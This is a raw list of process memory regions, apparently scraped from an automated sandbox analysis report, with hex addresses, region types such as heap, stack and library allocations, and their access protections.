7FF848F30000
trusted library allocation
page read and write
868737E000
stack
page read and write
2822000
trusted library allocation
page read and write
1B710000
heap
page read and write
1B83A000
heap
page read and write
246CF5F0000
trusted library allocation
page read and write
2487B530000
heap
page read and write
5140000
unkown
page readonly
3D0A000
trusted library allocation
page read and write
3112000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
E5B000
heap
page read and write
51F2000
unkown
page readonly
2A17467D000
heap
page read and write
BD6000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
2487B553000
heap
page read and write
31A3000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
2A10053D000
trusted library allocation
page read and write
2487B585000
heap
page read and write
DC877FC000
stack
page read and write
246CF5B0000
trusted library allocation
page read and write
8686A7E000
stack
page read and write
7FF848EE5000
trusted library allocation
page read and write
2A171E00000
heap
page read and write
2A175C0C000
heap
page read and write
86872FE000
stack
page read and write
7FF849230000
trusted library allocation
page read and write
2AA0000
heap
page read and write
1290000
trusted library section
page read and write
2487BD65000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
7FF8491E0000
trusted library allocation
page read and write
2A10008D000
trusted library allocation
page read and write
7FF848F1E000
trusted library allocation
page read and write
7FF849210000
trusted library allocation
page execute and read and write
2487B530000
heap
page read and write
246CF854000
heap
page read and write
3801EFE000
stack
page read and write
2487B3C0000
remote allocation
page read and write
2A60000
trusted library allocation
page read and write
19B9000
trusted library allocation
page read and write
2487BCCC000
heap
page read and write
26B5000
trusted library allocation
page read and write
2487BD12000
heap
page read and write
8687EFE000
unkown
page readonly
7FF848F84000
trusted library allocation
page read and write
2A1101D0000
trusted library allocation
page read and write
1399000
trusted library allocation
page read and write
424F000
stack
page read and write
DC875FA000
stack
page read and write
2487B510000
heap
page read and write
C05000
heap
page read and write
7FF848F49000
trusted library allocation
page read and write
2487B585000
heap
page read and write
2A100757000
trusted library allocation
page read and write
246CF690000
trusted library allocation
page read and write
119B000
heap
page read and write
2487B532000
heap
page read and write
D90000
trusted library allocation
page read and write
12B5000
heap
page read and write
2487AC22000
heap
page read and write
3090000
heap
page read and write
2487BD1B000
heap
page read and write
2487BCB8000
heap
page read and write
396E000
stack
page read and write
2A171DD0000
trusted library allocation
page read and write
2A1736F0000
trusted library allocation
page read and write
13A6000
heap
page read and write
7FF848E10000
trusted library allocation
page execute and read and write
2A175A30000
heap
page read and write
7FF848FD5000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
246CF8F6000
heap
page read and write
7FF848F11000
trusted library allocation
page read and write
5154000
unkown
page readonly
2A174660000
heap
page read and write
14D0000
trusted library allocation
page read and write
7FF848D8D000
trusted library allocation
page execute and read and write
246CF911000
heap
page read and write
468D000
stack
page read and write
2A175A82000
heap
page read and write
7FF4A7670000
trusted library allocation
page execute and read and write
2A1D000
trusted library allocation
page execute and read and write
2487B529000
heap
page read and write
13FE582B000
heap
page read and write
DC872F9000
stack
page read and write
13FE5640000
heap
page read and write
1ADEF000
stack
page read and write
2487BCE4000
heap
page read and write
7FF848F10000
trusted library allocation
page read and write
2487B533000
heap
page read and write
2487BC00000
heap
page read and write
4FAC000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
8B5000
heap
page read and write
DC8747E000
stack
page read and write
2A171ED1000
heap
page read and write
1B81B000
heap
page read and write
AC1000
unkown
page execute read
7FF8490F0000
trusted library allocation
page read and write
246CF861000
heap
page read and write
DA5000
trusted library allocation
page execute and read and write
246CF8C1000
heap
page read and write
2487BD1B000
heap
page read and write
246CF902000
heap
page read and write
7FF848F70000
trusted library allocation
page execute and read and write
1C12E000
stack
page read and write
2A1102C6000
trusted library allocation
page read and write
2FEF000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
86869FE000
unkown
page readonly
8685A7B000
stack
page read and write
7FF848FE9000
trusted library allocation
page read and write
246CF800000
heap
page read and write
13FE5A02000
heap
page read and write
246CA0BA000
heap
page read and write
86878FE000
unkown
page readonly
12A0000
trusted library allocation
page read and write
2487B52F000
heap
page read and write
ACB000
unkown
page readonly
1566000
heap
page read and write
1BB6D000
heap
page read and write
2487B579000
heap
page read and write
2A177D62000
heap
page read and write
246CAFA0000
trusted library section
page readonly
7FF849100000
trusted library allocation
page read and write
246CAFD0000
trusted library section
page readonly
2487AD3A000
heap
page read and write
2400000
heap
page execute and read and write
4DDE000
stack
page read and write
7FF848F86000
trusted library allocation
page read and write
2A174650000
heap
page read and write
B05000
heap
page read and write
12D9C000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
1241C000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
2487AC9E000
heap
page read and write
BBECAFD000
stack
page read and write
7FF848D62000
trusted library allocation
page read and write
2A171C50000
heap
page read and write
2A100085000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
2487B529000
heap
page read and write
17D1000
trusted library allocation
page read and write
2487AC13000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
2487B533000
heap
page read and write
7FF848D5B000
trusted library allocation
page execute and read and write
7FF848E36000
trusted library allocation
page execute and read and write
2A175B7C000
heap
page read and write
2487BCC6000
heap
page read and write
7FF848D43000
trusted library allocation
page read and write
2487B52E000
heap
page read and write
51EB000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
12EB1000
trusted library allocation
page read and write
F17000
heap
page read and write
C60000
unkown
page readonly
7FF848ED8000
trusted library allocation
page read and write
246CA900000
heap
page read and write
13FE5813000
unkown
page read and write
2487AC29000
heap
page read and write
24CF000
trusted library allocation
page read and write
7FF848E46000
trusted library allocation
page execute and read and write
2A174126000
heap
page read and write
46F0000
trusted library allocation
page read and write
246CF8E1000
heap
page read and write
7FF848FCE000
trusted library allocation
page read and write
1B7ED000
heap
page read and write
14BF000
stack
page read and write
7FF849113000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
56AB000
stack
page read and write
2487BC3C000
heap
page read and write
522E000
stack
page read and write
2487B532000
heap
page read and write
2A13000
trusted library allocation
page execute and read and write
B4E000
stack
page read and write
2A10007C000
trusted library allocation
page read and write
2487B50E000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
D80000
heap
page read and write
178C000
trusted library allocation
page read and write
1B98F000
stack
page read and write
246CF821000
heap
page read and write
7FF848D6D000
trusted library allocation
page execute and read and write
2EE0000
heap
page read and write
5E2000
heap
page read and write
8685EFE000
unkown
page readonly
5170000
trusted library allocation
page read and write
7FF8490D4000
trusted library allocation
page read and write
2A100240000
trusted library allocation
page read and write
DB0000
heap
page read and write
7FF848F56000
trusted library allocation
page read and write
7FF848D6D000
trusted library allocation
page execute and read and write
2A1720B5000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
7FF848F4C000
trusted library allocation
page read and write
2487B510000
heap
page read and write
2487BCB6000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
3F00000
unkown
page readonly
7FF848FE1000
trusted library allocation
page read and write
2487AD2C000
heap
page read and write
2487ACAF000
heap
page read and write
1159000
heap
page read and write
7FF848F57000
trusted library allocation
page read and write
460D000
stack
page read and write
44D0000
trusted library allocation
page read and write
7FF848F17000
trusted library allocation
page read and write
1B853000
heap
page execute and read and write
5BB0000
heap
page read and write
7FF848D53000
trusted library allocation
page execute and read and write
7FF849130000
trusted library allocation
page execute and read and write
2487BCB1000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
246CAB91000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
3D40000
trusted library allocation
page read and write
2A3A000
trusted library allocation
page execute and read and write
119F000
heap
page read and write
2487BCBB000
heap
page read and write
246CA041000
heap
page read and write
1110000
trusted library allocation
page read and write
23AE000
stack
page read and write
D96000
trusted library allocation
page execute and read and write
12D91000
trusted library allocation
page read and write
5360000
trusted library allocation
page execute and read and write
C61000
unkown
page execute read
DA0000
trusted library allocation
page read and write
2487BCE7000
heap
page read and write
7FF848E16000
trusted library allocation
page read and write
13A0000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
1B1B3000
heap
page read and write
86862FE000
unkown
page readonly
7FF848D80000
trusted library allocation
page read and write
1BB40000
heap
page read and write
8686BFE000
unkown
page readonly
1AEE0000
heap
page read and write
2A1101D3000
trusted library allocation
page read and write
7FF848F45000
trusted library allocation
page read and write
13FE5B00000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
2487B583000
heap
page read and write
7FF848E0C000
trusted library allocation
page execute and read and write
2487AD13000
heap
page read and write
7FF848D8B000
trusted library allocation
page execute and read and write
DC882FC000
stack
page read and write
7FF849020000
trusted library allocation
page read and write
1B680000
unkown
page readonly
17B5000
trusted library allocation
page read and write
1450000
heap
page read and write
2487AD19000
heap
page read and write
1B43D000
stack
page read and write
7FF848D7D000
trusted library allocation
page execute and read and write
DC885FE000
unkown
page readonly
46E0000
trusted library allocation
page read and write
1B7C4000
heap
page read and write
A20000
heap
page read and write
DE4000
stack
page read and write
246CF590000
trusted library allocation
page read and write
2EB1000
trusted library allocation
page read and write
19DF000
trusted library allocation
page read and write
7FF848F87000
trusted library allocation
page read and write
246CF817000
heap
page read and write
1B768000
stack
page read and write
2487BC7D000
heap
page read and write
2A173840000
trusted library section
page readonly
1B31D000
stack
page read and write
2487B52F000
heap
page read and write
13FE5B00000
heap
page read and write
2A175784000
heap
page read and write
2A175B1D000
heap
page read and write
246CA02B000
heap
page read and write
246CA079000
heap
page read and write
2487B552000
heap
page read and write
2A175AEF000
heap
page read and write
2487B572000
heap
page read and write
246CA113000
heap
page read and write
FBE000
stack
page read and write
2A1101A0000
trusted library allocation
page read and write
2487AC00000
heap
page read and write
2487ACC6000
heap
page read and write
2487BCB9000
heap
page read and write
11B7000
heap
page read and write
1030000
heap
page read and write
7FF8490B4000
trusted library allocation
page read and write
117D000
heap
page read and write
A20000
trusted library allocation
page read and write
13FE5924000
heap
page read and write
2A173890000
trusted library allocation
page read and write
246CF82E000
heap
page read and write
2487B532000
heap
page read and write
13FE5B13000
heap
page read and write
2A17405B000
heap
page read and write
BBEB903000
stack
page read and write
13FE5802000
unkown
page read and write
246CF710000
trusted library allocation
page read and write
7FF8490B6000
trusted library allocation
page read and write
2A171E40000
heap
page read and write
2A100569000
trusted library allocation
page read and write
2487B529000
heap
page read and write
D92000
trusted library allocation
page read and write
13FE5837000
heap
page read and write
A7E000
stack
page read and write
1B880000
heap
page read and write
7FF848FF5000
trusted library allocation
page read and write
2487BCA3000
heap
page read and write
1380000
trusted library allocation
page read and write
2487B563000
heap
page read and write
2487B579000
heap
page read and write
1C5ED000
stack
page read and write
11A1000
heap
page read and write
12BE000
heap
page read and write
2487B585000
heap
page read and write
5470000
heap
page read and write
2487B555000
heap
page read and write
2A1746AA000
heap
page read and write
246CA913000
heap
page read and write
3D37000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
2E32000
unkown
page readonly
2537000
trusted library allocation
page read and write
7FF848D70000
trusted library allocation
page read and write
246CF5E0000
trusted library allocation
page read and write
2A171E26000
heap
page read and write
2A175E52000
trusted library allocation
page read and write
246CA090000
heap
page read and write
2A174130000
heap
page execute and read and write
11DB000
heap
page read and write
1C1F3000
heap
page execute and read and write
2487BCBB000
heap
page read and write
2A1740BA000
heap
page read and write
A23000
trusted library allocation
page read and write
2487B532000
heap
page read and write
1B7FA000
heap
page read and write
2A80000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page execute and read and write
2A10024C000
trusted library allocation
page read and write
2487BCCD000
heap
page read and write
7FF849220000
trusted library allocation
page read and write
13FE5900000
trusted library allocation
page read and write
4CDE000
stack
page read and write
2487B530000
heap
page read and write
2487BCB5000
heap
page read and write
AD3000
unkown
page readonly
2A1737F0000
heap
page read and write
246CA05B000
heap
page read and write
2A70000
trusted library allocation
page execute and read and write
3241000
trusted library allocation
page read and write
7FF848D8B000
trusted library allocation
page execute and read and write
2487B529000
heap
page read and write
2487B532000
heap
page read and write
27D1000
trusted library allocation
page read and write
3F80000
trusted library allocation
page read and write
1B1EB000
heap
page read and write
7FF848D63000
trusted library allocation
page execute and read and write
2487AC81000
heap
page read and write
246CF5B1000
trusted library allocation
page read and write
DA0000
heap
page read and write
51A0000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
2487B533000
heap
page read and write
246CB520000
trusted library allocation
page read and write
246CF5D0000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
1BB9E000
heap
page read and write
2A171E86000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
2487BCB4000
heap
page read and write
2487B530000
heap
page read and write
2A1740B4000
heap
page read and write
BBECBFD000
stack
page read and write
DCE000
heap
page read and write
1214000
heap
page read and write
2A171E5C000
heap
page read and write
2791000
trusted library allocation
page read and write
7FF848FC3000
trusted library allocation
page read and write
2A171E20000
heap
page read and write
27E1000
trusted library allocation
page read and write
246CA802000
heap
page read and write
2A174640000
heap
page read and write
BBEB94E000
stack
page read and write
86875FB000
stack
page read and write
3CF0000
trusted library allocation
page read and write
1AFEF000
stack
page read and write
13FE5800000
unkown
page read and write
246CA0FF000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
7FF848F05000
trusted library allocation
page read and write
2A175AE2000
heap
page read and write
12C5000
heap
page read and write
9F0000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
246CF811000
heap
page read and write
246C9FF0000
heap
page read and write
17A1000
trusted library allocation
page read and write
7FF848F09000
trusted library allocation
page read and write
2487AC71000
heap
page read and write
C76000
unkown
page readonly
7FF849030000
trusted library allocation
page read and write
1B1E4000
heap
page read and write
86865FE000
stack
page read and write
1185000
heap
page read and write
6CD000
stack
page read and write
1250000
heap
page read and write
13FE5876000
heap
page read and write
2A110191000
trusted library allocation
page read and write
2A171D50000
heap
page read and write
2487B400000
heap
page read and write
7FF848F70000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
246CF520000
trusted library allocation
page read and write
1BBBE000
stack
page read and write
2A1737A0000
heap
page execute and read and write
1B1CC000
heap
page read and write
BBECCFD000
stack
page read and write
2487AD3A000
heap
page read and write
1D687000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
7FF848DBC000
trusted library allocation
page execute and read and write
246CA815000
heap
page read and write
2487BD2B000
heap
page read and write
246CA074000
heap
page read and write
246CA043000
heap
page read and write
868747E000
unkown
page readonly
2A174160000
heap
page read and write
7FF848F77000
trusted library allocation
page read and write
C00000
heap
page read and write
2487BC92000
heap
page read and write
2A100089000
trusted library allocation
page read and write
2487B50E000
heap
page read and write
246CF884000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
27D7000
trusted library allocation
page read and write
2A17468C000
heap
page read and write
3D20000
trusted library allocation
page read and write
2487B533000
heap
page read and write
2487AC74000
heap
page read and write
26A6000
trusted library allocation
page read and write
86861FC000
stack
page read and write
2A1740A9000
heap
page read and write
15CF000
stack
page read and write
7FF848F5E000
trusted library allocation
page read and write
2487AD02000
heap
page read and write
2487BC6D000
heap
page read and write
2487AD2C000
heap
page read and write
7FF848D34000
trusted library allocation
page read and write
2A1001FA000
trusted library allocation
page read and write
2A110228000
trusted library allocation
page read and write
13FE5902000
trusted library allocation
page read and write
3CB0000
trusted library allocation
page read and write
13FE5620000
heap
page read and write
C30000
heap
page read and write
2A175B6F000
heap
page read and write
1B180000
heap
page read and write
C1C000
stack
page read and write
7FF848DBC000
trusted library allocation
page execute and read and write
1BD00000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
2487B52E000
heap
page read and write
DD0000
heap
page read and write
2A177D59000
heap
page read and write
2A10067D000
trusted library allocation
page read and write
2487B552000
heap
page read and write
7FF848D7D000
trusted library allocation
page execute and read and write
246CF620000
trusted library allocation
page read and write
12EBF000
trusted library allocation
page read and write
DC87EFE000
unkown
page readonly
2A175A71000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
7FF848D6D000
trusted library allocation
page execute and read and write
7FF848F3D000
trusted library allocation
page read and write
2487BCBB000
heap
page read and write
251F000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page read and write
2487ACF8000
heap
page read and write
2487B529000
heap
page read and write
2487ACB5000
heap
page read and write
2A110094000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page execute and read and write
8686D7E000
stack
page read and write
2A174053000
heap
page read and write
2487B50E000
heap
page read and write
2A175777000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
BBEC9FC000
stack
page read and write
2487B572000
heap
page read and write
2487BD12000
heap
page read and write
2487BCCE000
heap
page read and write
2487ABB0000
heap
page read and write
D4E000
stack
page read and write
14C0000
heap
page read and write
13FE5720000
trusted library allocation
page read and write
246CF5B0000
trusted library allocation
page read and write
246CA076000
heap
page read and write
2487B585000
heap
page read and write
4490000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page execute and read and write
7FF848F10000
trusted library allocation
page read and write
2A171D30000
heap
page read and write
2A175C18000
heap
page read and write
2487BCB8000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
868697E000
stack
page read and write
2487B529000
heap
page read and write
26AD000
trusted library allocation
page read and write
246CF8B0000
heap
page read and write
D51000
stack
page read and write
1B780000
heap
page read and write
1B40000
trusted library allocation
page read and write
6BB000
stack
page read and write
C6D000
unkown
page readonly
7FF8490A0000
trusted library allocation
page read and write
D0E000
stack
page read and write
2A10023D000
trusted library allocation
page read and write
AD1000
unkown
page write copy
2487ABF0000
trusted library allocation
page read and write
3E9E000
stack
page read and write
BBEC7FE000
stack
page read and write
DC86D0B000
stack
page read and write
1BB80000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
4EAB000
stack
page read and write
2487B50E000
heap
page read and write
2487AD2C000
heap
page read and write
7FF848F50000
trusted library allocation
page read and write
DC87CFE000
unkown
page readonly
BBEC3F8000
stack
page read and write
7FF848D64000
trusted library allocation
page read and write
2A24000
trusted library allocation
page read and write
246CA013000
heap
page read and write
1189000
heap
page read and write
246CF680000
trusted library allocation
page read and write
1128000
stack
page read and write
586000
heap
page read and write
2487BD17000
heap
page read and write
DBB000
heap
page read and write
2487B529000
heap
page read and write
2A100255000
trusted library allocation
page read and write
2487B55B000
heap
page read and write
868717E000
stack
page read and write
DBE000
heap
page read and write
C74000
unkown
page read and write
7FF848F01000
trusted library allocation
page read and write
8B0000
heap
page read and write
23E0000
heap
page execute and read and write
246CF902000
heap
page read and write
1A9AD000
stack
page read and write
2A175A8E000
heap
page read and write
2487BCFC000
heap
page read and write
46D0000
trusted library allocation
page read and write
246CF8E4000
heap
page read and write
7FF848EE7000
trusted library allocation
page read and write
2487B55F000
heap
page read and write
2487BD02000
heap
page read and write
246CF90B000
heap
page read and write
BBEC4F4000
stack
page read and write
2487B537000
heap
page read and write
5142000
unkown
page readonly
7FF848D5D000
trusted library allocation
page execute and read and write
7BC000
stack
page read and write
2A100001000
trusted library allocation
page read and write
5350000
trusted library allocation
page execute and read and write
2487ACDA000
heap
page read and write
179E000
trusted library allocation
page read and write
2487B533000
heap
page read and write
11FF000
stack
page read and write
7FF848F66000
trusted library allocation
page read and write
7FF848D30000
trusted library allocation
page read and write
1B7DA000
heap
page read and write
12411000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page execute and read and write
2A175A6B000
heap
page read and write
26BE000
trusted library allocation
page read and write
59B000
heap
page read and write
2487AD2C000
heap
page read and write
2A14000
trusted library allocation
page read and write
DC87FFB000
stack
page read and write
7FF849090000
trusted library allocation
page read and write
448F000
stack
page read and write
2487BD06000
heap
page read and write
2487AB90000
heap
page read and write
246CA102000
heap
page read and write
BBEC5FE000
stack
page read and write
246CF8FA000
heap
page read and write
2487B553000
heap
page read and write
1130000
trusted library allocation
page read and write
1BE90000
unkown
page readonly
7FF848F7E000
trusted library allocation
page read and write
E6F000
heap
page read and write
2487B533000
heap
page read and write
2487B535000
heap
page read and write
2A174674000
heap
page read and write
7FF848D3D000
trusted library allocation
page execute and read and write
3FA0000
unkown
page readonly
2487AD1B000
heap
page read and write
2487BC7E000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page read and write
2487BCD3000
heap
page read and write
1BAA0000
trusted library allocation
page read and write
246D0000000
heap
page read and write
7FF849160000
trusted library allocation
page execute and read and write
7FF848F70000
trusted library allocation
page read and write
2487B513000
heap
page read and write
44F0000
trusted library allocation
page read and write
7FF8490CA000
trusted library allocation
page read and write
3CC0000
trusted library allocation
page read and write
2487BD25000
heap
page read and write
A30000
heap
page read and write
A80000
heap
page read and write
8685DF7000
stack
page read and write
7FF848FF0000
trusted library allocation
page read and write
2487BCF5000
heap
page read and write
2487B556000
heap
page read and write
246CF8FA000
heap
page read and write
7FF848EF8000
trusted library allocation
page read and write
246CA129000
heap
page read and write
28A1000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page execute and read and write
7FF848F40000
trusted library allocation
page read and write
C36000
heap
page read and write
B90000
heap
page read and write
1BABF000
stack
page read and write
D87000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
2A173BE9000
heap
page read and write
5BB000
heap
page read and write
2A1101DC000
trusted library allocation
page read and write
2487B569000
heap
page read and write
1B850000
heap
page execute and read and write
2A173743000
heap
page read and write
2487B535000
heap
page read and write
2487B415000
heap
page read and write
86870FE000
unkown
page readonly
10FE000
stack
page read and write
1B831000
heap
page read and write
116E000
stack
page read and write
86863FB000
stack
page read and write
26BC000
trusted library allocation
page read and write
1171000
heap
page read and write
2487B552000
heap
page read and write
2487BC8D000
heap
page read and write
2A00000
trusted library allocation
page read and write
11B3000
heap
page read and write
2487BCC2000
heap
page read and write
2A2D000
trusted library allocation
page execute and read and write
E63000
heap
page read and write
C74000
unkown
page write copy
12B0000
heap
page read and write
2487BC09000
heap
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
2487B55B000
heap
page read and write
A10000
trusted library allocation
page read and write
86866FE000
unkown
page readonly
2A1002EB000
trusted library allocation
page read and write
1280000
heap
page read and write
2487B52F000
heap
page read and write
DEA000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
7FF8490B2000
trusted library allocation
page read and write
246CF8BD000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
870000
heap
page read and write
2487BCBE000
heap
page read and write
2487BA80000
remote allocation
page read and write
1B849000
heap
page read and write
1229000
heap
page read and write
DB0000
heap
page read and write
2487B3C0000
remote allocation
page read and write
2A100694000
trusted library allocation
page read and write
2A100250000
trusted library allocation
page read and write
1BE10000
heap
page execute and read and write
A30000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
2487B55B000
heap
page read and write
2487BD12000
heap
page read and write
7FF848F0C000
trusted library allocation
page read and write
2487BD04000
heap
page read and write
13FF000
stack
page read and write
2A1100F2000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page read and write
DA7000
trusted library allocation
page execute and read and write
323B000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page execute and read and write
BBECDFE000
stack
page read and write
C40000
trusted library allocation
page read and write
DC883FE000
unkown
page readonly
7FF848FA0000
trusted library allocation
page read and write
BBEB98E000
stack
page read and write
2487BAA0000
remote allocation
page read and write
246CF84F000
heap
page read and write
10BE000
stack
page read and write
1BA56000
stack
page read and write
2487BCD3000
heap
page read and write
8686B7E000
stack
page read and write
246CAFE0000
trusted library section
page readonly
DC876FE000
unkown
page readonly
7FF848DEC000
trusted library allocation
page execute and read and write
86876FE000
unkown
page readonly
2EAE000
stack
page read and write
246CF750000
remote allocation
page read and write
D90000
heap
page read and write
2A177C90000
heap
page read and write
2487BD02000
heap
page read and write
2487B55B000
heap
page read and write
7FF848F37000
trusted library allocation
page read and write
7FF848DAC000
trusted library allocation
page execute and read and write
2487B3C0000
remote allocation
page read and write
2487B559000
heap
page read and write
2487AC82000
heap
page read and write
2487BCFA000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
2487B50E000
heap
page read and write
2A173750000
heap
page read and write
2C90000
heap
page execute and read and write
7FF8490EA000
trusted library allocation
page read and write
BEE000
stack
page read and write
2487BCFF000
heap
page read and write
D80000
trusted library allocation
page read and write
246CA06F000
heap
page read and write
2487BC0A000
heap
page read and write
7FF848D80000
trusted library allocation
page read and write
8687E7E000
stack
page read and write
7FF848F7B000
trusted library allocation
page read and write
8686DFE000
unkown
page readonly
1150000
heap
page read and write
2A1005F8000
trusted library allocation
page read and write
55AE000
stack
page read and write
7FF848F30000
trusted library allocation
page read and write
D90000
heap
page read and write
2487BC9C000
heap
page read and write
2487BD0A000
heap
page read and write
44C0000
trusted library allocation
page read and write
2A173740000
heap
page read and write
1195000
heap
page read and write
246CF530000
trusted library allocation
page read and write
246CF5A0000
trusted library allocation
page read and write
2487AD2B000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
3F7E000
stack
page read and write
1110000
heap
page read and write
246CF680000
trusted library allocation
page read and write
2A175A6E000
heap
page read and write
86864FE000
unkown
page readonly
2487B583000
heap
page read and write
2487B55A000
heap
page read and write
5300000
heap
page execute and read and write
7FF848F07000
trusted library allocation
page read and write
464D000
stack
page read and write
2487AC2B000
heap
page read and write
2A171D70000
heap
page read and write
2487B556000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
E1B000
heap
page read and write
246CF8EF000
heap
page read and write
2487BD2C000
heap
page read and write
2A171DB0000
heap
page read and write
C50000
trusted library allocation
page read and write
2487B55A000
heap
page read and write
2A1005CE000
trusted library allocation
page read and write
7FF848D73000
trusted library allocation
page read and write
2A175B12000
heap
page read and write
2A175AC0000
heap
page read and write
2A40000
trusted library allocation
page read and write
2E0E000
stack
page read and write
EC7000
heap
page read and write
3D50000
heap
page execute and read and write
1BB93000
heap
page read and write
2A100248000
trusted library allocation
page read and write
2487ABC0000
heap
page read and write
2487B52C000
heap
page read and write
246CAFC0000
trusted library section
page readonly
246CF8D2000
heap
page read and write
2487BD34000
heap
page read and write
2851000
trusted library allocation
page read and write
1193000
heap
page read and write
2A174133000
heap
page execute and read and write
2C6E000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
115B000
heap
page read and write
2487ACE5000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
246CF5E0000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
143E000
stack
page read and write
7FF848FB0000
trusted library allocation
page read and write
2487B55B000
heap
page read and write
2487B52C000
heap
page read and write
1BDDE000
stack
page read and write
C54000
trusted library allocation
page read and write
2487B55A000
heap
page read and write
3D10000
trusted library allocation
page execute and read and write
13BF000
stack
page read and write
7FF848DE0000
trusted library allocation
page read and write
C74000
unkown
page read and write
12420000
trusted library allocation
page read and write
13FE5A13000
heap
page read and write
2A175B31000
heap
page read and write
434E000
stack
page read and write
2A10007A000
trusted library allocation
page read and write
7FF848FA3000
trusted library allocation
page read and write
7FF849200000
trusted library allocation
page read and write
7FF848D72000
trusted library allocation
page read and write
86868FE000
unkown
page readonly
13FE5915000
trusted library allocation
page read and write
5A1000
heap
page read and write
2487B532000
heap
page read and write
2A177D1F000
heap
page read and write
C10000
unkown
page readonly
1185000
heap
page read and write
2A47000
trusted library allocation
page execute and read and write
2A175C20000
heap
page read and write
670000
heap
page read and write
BBEC8FE000
stack
page read and write
1243000
heap
page read and write
2487B510000
heap
page read and write
7FF848D7B000
trusted library allocation
page execute and read and write
1C670000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
1B7A2000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
1157000
heap
page read and write
2487BC5B000
heap
page read and write
2487AD2B000
heap
page read and write
4510000
trusted library allocation
page read and write
2E6E000
stack
page read and write
7FF848F00000
trusted library allocation
page read and write
246CF842000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
7FF848E16000
trusted library allocation
page execute and read and write
1199000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
There are 1231 hidden memdumps, click here to show them.